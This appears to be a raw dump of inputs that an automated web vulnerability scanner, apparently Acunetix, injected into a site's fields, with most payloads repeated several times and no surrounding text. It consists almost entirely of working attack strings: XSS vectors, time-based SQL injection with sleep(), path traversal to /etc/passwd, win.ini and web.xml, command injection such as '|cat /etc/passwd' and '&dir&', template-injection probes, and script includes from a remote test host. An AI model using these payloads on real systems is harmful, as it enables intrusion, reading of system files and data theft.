1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(946418)"></g></svg>

1

"|"ld

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<div style=width:expression(prompt(907701))>

-1

1

1

1&n940021=v925723

1

1<iframe src='data:text/html

-1)

1some_inexistent_file_with_long_name%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

'

1

1

1

1<body onload=prompt(935423)>

-1))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(963262)>

7w3xAsyx'

^(#$!@#$)(()))******

'"()

testasp.vulnweb.com

/etc/passwd

1

||cat /etc/passwd

u3wNqfbV')

1<img src=xyz OnErRor=prompt(960357)>

'

1

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

kcHfObII'))

1

1

"

&dir

1<img/src=">" onerror=alert(960715)>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1

1

1

1

1

'&dir&'

-1)

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}

1<ScRiPt%20>prompt(903742)</sCripT>

1

1

1

http://hitHQcNaIgQAa.bxss.me/

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1))

1&lt

${@print(md5(acunetix_wvs_security_test))}\

comments

"&dir&"

1

1

1

1

38H8rs4n'

1

|dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

\xf6<img acu onmouseover=prompt(931554) //\xf6>

file:///etc/passwd

'"

1

5ePK0PyD')

http://www.acunetix.tst

1

1

'|dir

comments/.

/\../\../\../\../\../\../\../etc/passwd

<!--

1'"()&%<ScRiPt >prompt(909933)</ScRiPt>

1

1

2FXriVi2'))

WEB-INF/web.xml

1

"|dir

1

1<input autofocus onfocus=prompt(916856)>

1

1

'"()&%<ScRiPt >prompt(992540)</ScRiPt>

1

1

1

1

1

WEB-INF\web.xml

<a href='http://www.acunetix.com'>website security</a>

1

1

1_987797

1

1

../../../../../../../../../../windows/win.ini

[url=http://www.acunetix.com]website security[/url]

1

1

1_7im40 <ScRiPt >prompt(922656)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

acu5030\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5030

1

1

response.write(9514184*9811129)

1

1

acux3458\xc0\xbez1\xc0\xbcz2a\x90bcxuca3458

1

'+response.write(9514184*9811129)+'

1<ScRiPt >prompt(927684)</ScRiPt>

1

&cat /etc/passwd&

"+response.write(9514184*9811129)+"

WEB-INF/web.xml

1

1

1

1<script>prompt(950277)</script>

1

1

'&cat /etc/passwd&'

WEB-INF\web.xml

1

1<ScRiPt >prompt(920548)</ScRiPt>

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?915427></ScRiPt>

1

"&cat /etc/passwd&"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<ScRiPt >prompt(906562)</ScRiPt>

../../../../../../../../../../etc/passwd

cat /etc/passwd

1

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<video><source onerror="javascript:prompt(916969)">

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

`cat /etc/passwd`

${100271+100355}

1

../../../../../../../../../../etc/passwd.jpg

1&n911126=v996416

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(978679)"></g></svg>

1some_inexistent_file_with_long_name%00.jpg

1

-1

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<div style=width:expression(prompt(949626))>

1

|cat /etc/passwd#

1

1

)

-1)

testasp.vulnweb.com

'|'ld

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<iframe src='data:text/html

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1))

1

!(()&&!|*|*|

'"()

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1<body onload=prompt(984216)>

"|"ld

1

'

1

^(#$!@#$)(()))******

KPsiDQRL'

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(939178)>

1

"

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

1

Wfm8FWKo')

1

1<img src=xyz OnErRor=prompt(944888)>

1

http://hitYBkQzuL5sT.bxss.me/

'

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

/etc/passwd

1

1<img/src=">" onerror=alert(902595)>

1

1

JRKRqT7w'))

"

comments

1

1

1

-1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1<ScRiPt%20>prompt(948233)</sCripT>

1

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

||cat /etc/passwd

comments

-1)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'"

1

comments/.

-1))

1

1&lt

1

1

1

<!--

&dir

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

EgkldKxr'

1

1'"()&%<ScRiPt >prompt(921947)</ScRiPt>

\xf6<img acu onmouseover=prompt(946657) //\xf6>

1

'&dir&'

1

1

1

'"()&%<ScRiPt >prompt(950414)</ScRiPt>

1<input autofocus onfocus=prompt(990211)>

DiJrv11g')

1

file:///etc/passwd

"&dir&"

1

1_958984

<a href='http://www.acunetix.com'>website security</a>

1

8QTuo2xw'))

/\../\../\../\../\../\../\../etc/passwd

1

|dir

1

[url=http://www.acunetix.com]website security[/url]

WEB-INF/web.xml

1

1_IaXyE <ScRiPt >prompt(916728)</ScRiPt>

'|dir

WEB-INF\web.xml

1

1

"|dir

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1

1

1

acu4168\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4168

response.write(9619028*9124168)

..\..\..\..\..\..\..\..\windows\win.ini

acux8170\xc0\xbez1\xc0\xbcz2a\x90bcxuca8170

1

1

1

'+response.write(9619028*9124168)+'

1<ScRiPt >prompt(992947)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

"+response.write(9619028*9124168)+"

&cat /etc/passwd&

1

1<script>prompt(921102)</script>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt >prompt(996909)</ScRiPt>

'&cat /etc/passwd&'

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

"&cat /etc/passwd&"

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?992744></ScRiPt>

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

1<ScRiPt >prompt(938757)</ScRiPt>

cat /etc/passwd

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1<video><source onerror="javascript:prompt(968881)">

1

`cat /etc/passwd`

WEB-INF/web.xml

1

../../../../../../../../../../etc/passwd.jpg

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(981903)"></g></svg>

1

1

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

WEB-INF\web.xml

|cat /etc/passwd#

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1<div style=width:expression(prompt(991425))>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

'|'ld

1

1

1

-1

${99975+99332}

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1<iframe src='data:text/html

1

-1)

1

"|"ld

1

1<body onload=prompt(993521)>

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n917392=v914907

1

-1))

)

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(909623)>

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1some_inexistent_file_with_long_name%00.jpg

'

KUGA20gv'

1<img src=xyz OnErRor=prompt(917767)>

'"()

!(()&&!|*|*|

1

/etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

EU3rBbMb')

^(#$!@#$)(()))******

1

"

1<img/src=">" onerror=alert(902433)>

1

BzYiKJwa'))

'

1

testasp.vulnweb.com

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1<ScRiPt%20>prompt(920378)</sCripT>

1

1

1

-1

||cat /etc/passwd

1&lt

1

1

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

-1)

http://testasp.vulnweb.com/t/xss.html?%00.jpg

\xf6<img acu onmouseover=prompt(979260) //\xf6>

&dir

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

1

http://hit9aPqV6Lsx2.bxss.me/

'&dir&'

1

1<input autofocus onfocus=prompt(904814)>

1

-1))

${@print(md5(acunetix_wvs_security_test))}\

1

1

acunetix_wvs_invalid_filename

1

<a href='http://www.acunetix.com'>website security</a>

0yCXVjzd'

1

"&dir&"

1

[url=http://www.acunetix.com]website security[/url]

file:///etc/passwd

comments

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

|dir

1

Nf6avYBP')

1

1

comments

/\../\../\../\../\../\../\../etc/passwd

1_DclcN <ScRiPt >prompt(992352)</ScRiPt>

ZDN9ajd0'))

'|dir

1

'"

1'"()&%<ScRiPt >prompt(964258)</ScRiPt>

WEB-INF/web.xml

1

comments/.

1

1

<!--

"|dir

1

1

'"()&%<ScRiPt >prompt(981141)</ScRiPt>

1

1

WEB-INF\web.xml

1

1

1

1_920216

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

acu7637\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7637

response.write(9614957*9789670)

1

1

acux7188\xc0\xbez1\xc0\xbcz2a\x90bcxuca7188

WEB-INF/web.xml

1

'+response.write(9614957*9789670)+'

1<ScRiPt >prompt(916326)</ScRiPt>

1

1

WEB-INF\web.xml

1

"+response.write(9614957*9789670)+"

1

1<script>prompt(913345)</script>

&cat /etc/passwd&

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

'&cat /etc/passwd&'

1<ScRiPt >prompt(901245)</ScRiPt>

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?939694></ScRiPt>

1

"&cat /etc/passwd&"

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<ScRiPt >prompt(942957)</ScRiPt>

1

../../../../../../../../../../etc/passwd

1

cat /etc/passwd

1

1

1<video><source onerror="javascript:prompt(995501)">

1

1

`cat /etc/passwd`

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

${100079+99047}

1

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(990801)"></g></svg>

1

|cat /etc/passwd#

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

../../../../../../../../../../etc/passwd.jpg

1<div style=width:expression(prompt(931976))>

1

1

1&n973386=v975169

1

1some_inexistent_file_with_long_name%00.jpg

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

)

1<iframe src='data:text/html

'|'ld

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

-1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

!(()&&!|*|*|

1<body onload=prompt(932439)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'"()

^(#$!@#$)(()))******

-1)

testasp.vulnweb.com

1

"|"ld

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(922910)>

'

1

1

-1))

1

1

1

rMCH73hb'

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<img src=xyz OnErRor=prompt(923960)>

"

1

'

1

1

bFR6G7Ou')

/etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1<img/src=">" onerror=alert(987660)>

http://hitezTYgg77UC.bxss.me/

1

"

1

RjWXiiOs'))

1

acunetix_wvs_invalid_filename

-1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1<ScRiPt%20>prompt(979221)</sCripT>

${@print(md5(acunetix_wvs_security_test))}\

1

1

comments

1

1

||cat /etc/passwd

-1)

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1&lt

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

http://www.acunetix.tst

-1))

&dir

'"

comments/.

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

\xf6<img acu onmouseover=prompt(980486) //\xf6>

1

'&dir&'

<!--

IVvsRqBe'

1

1

1<input autofocus onfocus=prompt(911359)>

1

1

1

1

uGuyHYpQ')

"&dir&"

1

1

file:///etc/passwd

1'"()&%<ScRiPt >prompt(959140)</ScRiPt>

<a href='http://www.acunetix.com'>website security</a>

1

XT16mOJh'))

1

|dir

1

1

[url=http://www.acunetix.com]website security[/url]

'"()&%<ScRiPt >prompt(984579)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

1

'|dir

1_f4TiR <ScRiPt >prompt(901969)</ScRiPt>

1_939800

1

WEB-INF/web.xml

1

1

"|dir

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1

../../../../../../../../../../boot.ini

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

response.write(9504941*9051024)

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

acu6565\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6565

1

'+response.write(9504941*9051024)+'

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

"+response.write(9504941*9051024)+"

1

acux7705\xc0\xbez1\xc0\xbcz2a\x90bcxuca7705

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1

1<ScRiPt >prompt(991617)</ScRiPt>

1

1

1

1

1<script>prompt(993054)</script>

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1<ScRiPt >prompt(928664)</ScRiPt>

1

WEB-INF/web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

1

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?963664></ScRiPt>

1

${99535+99554}

cat /etc/passwd

1

1

1

../../../../../../../../../../etc/passwd.jpg

WEB-INF\web.xml

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<ScRiPt >prompt(905098)</ScRiPt>

`cat /etc/passwd`

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1

1

1&n920569=v958624

1<video><source onerror="javascript:prompt(906627)">

1

1

1some_inexistent_file_with_long_name%00.jpg

|cat /etc/passwd#

)

1

-1)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(949640)"></g></svg>

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

1

1<div style=width:expression(prompt(993995))>

1

-1))

testasp.vulnweb.com

/../..//../..//../..//../..//../..//etc/passwd.jpg

^(#$!@#$)(()))******

1<iframe src='data:text/html

1

haimoSYF'

1

"|"ld

'"()

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1<body onload=prompt(905041)>

'

rF9ydIFA')

1

1

1

1

1

i1RU5dPq'))

"

/etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(929890)>

1

-1

1

1

'

1<img src=xyz OnErRor=prompt(965655)>

1

1

${@print(md5(acunetix_wvs_security_test))}

1

-1)

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1<img/src=">" onerror=alert(925609)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

http://hithL0cg8N3at.bxss.me/

"

1

-1))

1

${@print(md5(acunetix_wvs_security_test))}\

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

acunetix_wvs_invalid_filename

1

1<ScRiPt%20>prompt(988959)</sCripT>

1

||cat /etc/passwd

IX8s1LdW'

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

comments

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'"

1&lt

1

&dir

fFmK1R3T')

1

1

comments

<!--

1

comments/.

'&dir&'

1'"()&%<ScRiPt >prompt(969367)</ScRiPt>

AORM1LJT'))

1

1

file:///etc/passwd

1

1

\xf6<img acu onmouseover=prompt(944665) //\xf6>

1

1

"&dir&"

'"()&%<ScRiPt >prompt(979417)</ScRiPt>

1

1

1<input autofocus onfocus=prompt(922259)>

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1_910703

|dir

1

WEB-INF/web.xml

<a href='http://www.acunetix.com'>website security</a>

1

'|dir

1

WEB-INF\web.xml

[url=http://www.acunetix.com]website security[/url]

1

"|dir

../../../../../../../../../../windows/win.ini

1

1

1_zGeNL <ScRiPt >prompt(989854)</ScRiPt>

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

................windowswin.ini

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

acu9923\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9923

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

acux8615\xc0\xbez1\xc0\xbcz2a\x90bcxuca8615

1

1<ScRiPt >prompt(920657)</ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<script>prompt(948494)</script>

1

1

1

1<ScRiPt >prompt(980090)</ScRiPt>

1

response.write(9122138*9633834)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?991051></ScRiPt>

1

1

1

'+response.write(9122138*9633834)+'

1

1<ScRiPt >prompt(906759)</ScRiPt>

1

1

"+response.write(9122138*9633834)+"

1

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF/web.xml

1<video><source onerror="javascript:prompt(944038)">

1

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF\web.xml

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(997630)"></g></svg>

../../../../../../../../../../etc/passwd

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<div style=width:expression(prompt(909979))>

1

1

1

1

cat /etc/passwd

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<iframe src='data:text/html

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

${100281+99751}

1

1<body onload=prompt(935960)>

1

1

1

`cat /etc/passwd`

1

1

1

../../../../../../../../../../etc/passwd.jpg

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(959542)>

)

1&n912443=v912322

1

1

|cat /etc/passwd#

1

1<img src=xyz OnErRor=prompt(986539)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1some_inexistent_file_with_long_name%00.jpg

-1

!(()&&!|*|*|

'|'ld

1

1

1

^(#$!@#$)(()))******

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<img/src=">" onerror=alert(910007)>

-1)

1

'"()

1

"|"ld

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<ScRiPt%20>prompt(983272)</sCripT>

-1))

testasp.vulnweb.com

1

'

1

1

1

iimCixyB'

1&lt

1

1

"

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

\xf6<img acu onmouseover=prompt(929681) //\xf6>

1

'

1

G2OnS1Ll')

1

${@print(md5(acunetix_wvs_security_test))}

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/etc/passwd

1<input autofocus onfocus=prompt(981997)>

797nh1yP'))

"

1

http://hitbo0i9H2rpJ.bxss.me/

acunetix_wvs_invalid_filename

<a href='http://www.acunetix.com'>website security</a>

1

${@print(md5(acunetix_wvs_security_test))}\

1

-1

1

comments

||cat /etc/passwd

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

-1)

1

1

comments

[url=http://www.acunetix.com]website security[/url]

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

&dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

-1))

1

1

comments/.

1

1

eMse8q03'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'&dir&'

1

1

1

'"

1_r0oEx <ScRiPt >prompt(937668)</ScRiPt>

1

1'"()&%<ScRiPt >prompt(980761)</ScRiPt>

90pKLIAK')

1

"&dir&"

1

<!--

1

1

'"()&%<ScRiPt >prompt(976232)</ScRiPt>

|dir

CKSsGBuY'))

file:///etc/passwd

1

1

1

1_961863

1

/\../\../\../\../\../\../\../etc/passwd

1

1

'|dir

1

WEB-INF/web.xml

1

1

"|dir

1

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

acu1516\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1516

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acux8282\xc0\xbez1\xc0\xbcz2a\x90bcxuca8282

1

................windowswin.ini

1<ScRiPt >prompt(990350)</ScRiPt>

1

response.write(9321132*9422341)

1

..\..\..\..\..\..\..\..\windows\win.ini

'+response.write(9321132*9422341)+'

1<script>prompt(967276)</script>

&cat /etc/passwd&

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

"+response.write(9321132*9422341)+"

1<ScRiPt >prompt(910802)</ScRiPt>

'&cat /etc/passwd&'

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?921416></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1<ScRiPt >prompt(974541)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(917961)">

cat /etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(966429)"></g></svg>

1

`cat /etc/passwd`

1

1

1

../../../../../../../../../../etc/passwd

1<div style=width:expression(prompt(941880))>

SomeCustomInjectedHeader:injected_by_wvs

|cat /etc/passwd#

1

WEB-INF/web.xml

1

1

